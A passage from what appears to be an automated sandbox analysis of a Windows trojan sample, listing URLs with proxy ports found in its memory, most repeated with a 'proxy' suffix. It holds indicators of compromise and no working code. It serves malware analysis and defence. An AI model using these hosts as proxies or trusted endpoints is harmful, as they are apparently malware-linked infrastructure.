                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.91.125.238:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.95.10.208:8082
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://80.95.10.208:8082://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.0.221.90:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.0.221.90:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.103.105.130:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C850F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.103.105.130:8888://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.119.171:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.124.50:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.12.124.50:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.134.57.82:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.134.57.82:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.145.242.14:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.145.242.14:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.16.1.188:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.16.1.188:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.161.236.152:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.161.236.152:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.17.94.50:34300
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.17.94.50:34300://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.177.6.68:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.177.6.68:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.17:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.17:1088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.49:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.199.14.49:1088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.219.155.193:65000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.219.155.193:65000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C90FE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.23.114.238:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.23.114.238:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.250.223.126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.250.223.126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.250.223.126:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.43.68.47:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.43.68.47:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.44.83.70:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.44.83.70:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.68.190.184:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.68.190.184:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.69.243.126:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.69.243.126:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.70.253.152:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.70.253.152:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C779D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.139.76:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C779D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.91.139.76:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.94.255.13:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://81.94.255.13:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.10.104:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.102.10.104:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C757D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.113.157.122:31280
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.113.157.122:31280://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.117.252.143:13978
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.117.252.143:13978://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.119.96.254:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.135.123.155:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.135.123.155:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.146.37.145:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.105.48
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.105.48://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.105.48:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.208.126:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.165.208.126:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.194.133.209:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.194.133.209:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.200.106.177:5225
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.200.106.177:5225://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C850F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.208.111.19:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.210.56.251:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.102.92:9443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.102.92:9443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:54368
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:54368://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:63596
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.223.121.72:63596://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.64.77.30:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.65.98.35:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.65.98.35:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.66.210.159:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.66.210.159:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.69.16.184://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.69.16.184:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.69.16.184x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.97.215.240
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.97.215.240://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://82.97.215.240:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.104.215.88:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.104.215.88:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.118.211.14:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.118.211.14:3129://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.12.149.202:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.12.149.202:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.126.54.155:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.126.54.155:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.136.219.140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.136.219.140://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.136.219.140:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.149.249.81:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.149.249.81:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.168.84.86:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.168.84.86:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.171.90.83:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.171.90.83:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.221.222.240:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.221.222.240:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.234.147.166:6363
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.234.147.166:6363://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.12:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.12:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB46000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.14:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAB53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.14:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.17:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.17:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB0F0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.30:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.238.80.30:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.97.79.72:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.97.79.72:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.35.129:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.35.129:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.235:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.17.51.235:3128://proxy
